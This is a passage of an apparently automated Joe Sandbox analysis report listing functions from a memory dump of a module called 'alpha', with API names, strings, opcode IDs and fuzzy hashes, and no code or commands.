                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298452353.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Heap$AllocProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1617791916-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: aa7e40b5d99d9a56d3058fd520baa9575a550189048c001a86f2540850faebe3
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 063b3e903279888d6d7b745234a001a688b7cd7982b54247d6f368017d330862
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aa7e40b5d99d9a56d3058fd520baa9575a550189048c001a86f2540850faebe3
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B8F01936A18B42C6EA14AB15FC6007AFBA0FF99B40BD99535D94E03358DF3CA442C620
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EC4C1C Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298263710.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706F04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298452353.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: exit
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2483651598-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: e255d2af7c18615348d8cf7a7b788cdf459202c7b5a34beac69f38e8db5c085f
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 90430df3a5be4bcf1ba3c50f497a30f48f6922419e394205c44485a56069c279
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e255d2af7c18615348d8cf7a7b788cdf459202c7b5a34beac69f38e8db5c085f
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 53C01230B08B46C7FB2C7B312CB143A99A57F48211F846838CA0B8A2D2DF2CD8098620
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EC5508 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298263710.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706F04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298452353.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: DefaultUser
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3358694519-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 5d8fc4fa8e665926eb49570ec356dc21582dec5ebc006b351cd7b5a4e2c943bd
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 151a5ca9c137e4378c24921fa030fea3973e8292ba5ed08075eb233a0293c3ab
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5d8fc4fa8e665926eb49570ec356dc21582dec5ebc006b351cd7b5a4e2c943bd
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 11E0C2A2D083538AF5543A416C613B69953EF687A2FC44031CA0D023C94B2D38635628
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EC2E44 Relevance: 1.3, APIs: 1, Instructions: 29COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298263710.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706F04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298452353.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: memset
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2221118986-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: f77ccc38f2f42b08cf4ed255524ec50c837bf5ddba9254f495b6a2bfe7d154bb
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: a44a212e40b99fc4bd1c6820c83908a7b8771fe08deee0c51afb434b1223b4ee
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f77ccc38f2f42b08cf4ed255524ec50c837bf5ddba9254f495b6a2bfe7d154bb
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 97F0E921B0978544EB40975BBD5016A9291AF48BF0F888330EF7C47BC5DF3CD4528300

                                                                                                                                                                                                                                                                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EB3410 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 160windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298263710.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706F04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298452353.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: FormatMessage$ByteCharMultiWide_ultoawcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: $Application$P<dwj`$System
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3538039442-1396859947
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 6194e2a1b63514fbe775a342b0db58f28aa4d046a1287b5b4022a3f3c67c0b5b
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: ad73454984b7cbd2917102196f8b5b7e32f5d7517905a82e9587d1004ce2a304
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6194e2a1b63514fbe775a342b0db58f28aa4d046a1287b5b4022a3f3c67c0b5b
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 41518D36A08B4196EB20AB15BC206BBFAA1FF89B48F859235DE4E43794DF3DD445C710
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EB372C Relevance: 23.1, APIs: 10, Strings: 3, Instructions: 396COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298263710.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706F04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298452353.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: wcsrchr$ErrorLast$AttributesFile_wcsnicmpiswspacememsetwcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: COPYCMD$P<dwj`$\
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3989487059-2735501161
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 5bff41a680e467b1b33a0b7bb16375dc4a11cdb88bd4a8787dadcd2c99fb79b7
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 5b937e1f8b9b406542b2eaaecd17132087e1067d9823345af16ee3ae62f70ea2
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5bff41a680e467b1b33a0b7bb16375dc4a11cdb88bd4a8787dadcd2c99fb79b7
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 28F1D326B0878682EA20BB15DC652BBE3A0FF45B88F949135CE4E477A5EF3CE445C310
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EBB0D8 Relevance: 19.6, APIs: 9, Strings: 2, Instructions: 320COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298263710.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706F04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298452353.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: _get_osfhandlememset$wcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: DPATH$P<dwj`
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3260997497-4031221363
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 3d336d0508f9d51260e4716dc0b75001e2ca59ffb0876634830191a582af1c3b
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 82bfcc47faf22433538619e7b0547c552e494b268131d71cf2db7bb0d1e1ffb9
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3d336d0508f9d51260e4716dc0b75001e2ca59ffb0876634830191a582af1c3b
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3ED17032A08B4286EB24BB65DC611BFA2A1FF44BA4F945235DA1D477D4DF3CE846C360
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EC7FF8 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 87filenativeCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298263710.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706F04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298452353.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: File$InformationNamePathRelative$CloseDeleteErrorFreeHandleLastName_OpenQueryReleaseStatusStringUnicodeVolumeWith
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: @P
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1801357106-3670739982
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: a098cbb43c680f3415d79602374c39353e633b648bff1f45cd59ed0b1006156a
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: d3a5ea9f339798fbd8f372587db7ef8c1cddc2dac312a775404632cd025d0db0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a098cbb43c680f3415d79602374c39353e633b648bff1f45cd59ed0b1006156a
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C9413B32B04B45DAE710AF61D8642EEABA0FB89B58F844231DA1D43A98DF78D504C750
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EB9B50 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 252COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298263710.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706F04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298452353.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Heap$AllocProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: P<dwj`
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1617791916-4006019111
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 3743209a10b96ebcc181eebe11116311313ddf8ce3d63fdcd25b8e532d2a8f02
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 95bd1373d40f1bf5b067444393cd3d3e6914878c3e236b2ff1cb689f428243e6
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3743209a10b96ebcc181eebe11116311313ddf8ce3d63fdcd25b8e532d2a8f02
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B0A1B321A1874286EB20BB25AC6167BB6E0FF99B90FD15235DE4E47796DF3CE401C720
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EDBCF0 Relevance: 10.6, APIs: 7, Instructions: 52filenativeCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298263710.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706F04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298452353.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: ExclusiveLock$AcquireBufferCancelConsoleFileFlushInputReleaseSynchronous_get_osfhandlefflushfprintf
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3476366620-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 6372b5247c68ad753e8b139ca81a5779740cabb9e500d40167355afd769c266a
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: cd8846b952ef2c08dea24ff2da81df1dd8e123bfe33540731bc99edc668aef6a
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6372b5247c68ad753e8b139ca81a5779740cabb9e500d40167355afd769c266a
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DB21FF64D18B4296EA147B20EC352BAEB50FF5A725FC55275C55E432E1EF3CA4098620
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706ED7B4C Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 269fileCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298263710.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706F04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298452353.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
